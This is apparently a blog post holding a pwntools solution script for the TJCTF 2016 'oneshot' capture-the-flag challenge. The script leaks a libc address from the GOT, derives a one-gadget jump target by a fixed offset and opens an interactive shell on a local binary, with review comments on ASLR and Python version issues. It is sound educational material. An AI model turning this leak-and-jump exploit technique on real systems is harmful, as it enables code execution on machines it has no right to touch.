CTF
TJCTF 2016 oneshot
공부하자~~
2019. 1. 24. 17:44
# Solution script for the TJCTF 2016 "oneshot" challenge, run against a local
# copy of the binary.
#
# Flow visible in the script: the program first accepts an address and prints
# the value stored there ("Value: <hex>"), then asks for a "Jump location?".
# The script reads the resolved address of puts out of the GOT and derives a
# second libc address from it by a fixed offset.
#
# Takeaway for hardening: a single disclosed libc pointer is enough to locate
# everything else in that library, because offsets inside one libc build are
# constant. ASLR only helps while no such pointer leaks.
#
# NOTE(review): the str arguments to recvuntil()/replace() assume the recv*
# calls return str (Python 2-era pwntools). On Python 3 they return bytes and
# the str/bytes mix in replace() would raise TypeError. Confirm the interpreter.
from pwn import *

BINARY = "./oneshot"

# Offset subtracted from puts to reach the address sent as the jump location.
# NOTE(review): this is tied to one specific libc build, presumably the one on
# the author's machine; the page does not say which. It will not hold elsewhere.
PUTS_TO_TARGET = 0x2a47a

r = process(BINARY)
elf = ELF(BINARY)

# Address of the GOT slot for puts, taken from the ELF as-is.
# NOTE(review): using it unrebased presumably means the binary is non-PIE.
puts_got = elf.got['puts']

# Drop whatever the program prints first (the initial prompt).
r.recv()

# The address is sent as a decimal string.
r.sendline(str(puts_got))

# The reply has the form "Value: <hex>\n"; keep only the hex digits.
r.recvuntil("Value: ")
leaked_line = r.recvuntil("\x0a")
libc_puts = int(leaked_line.replace("\x0a", ""), 16)

oneshot = libc_puts - PUTS_TO_TARGET

log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("oneshot = {}".format(hex(oneshot)))

# Second prompt: the jump target, again as a decimal string.
r.recvuntil("Jump location?")
r.sendline(str(oneshot))

r.interactive()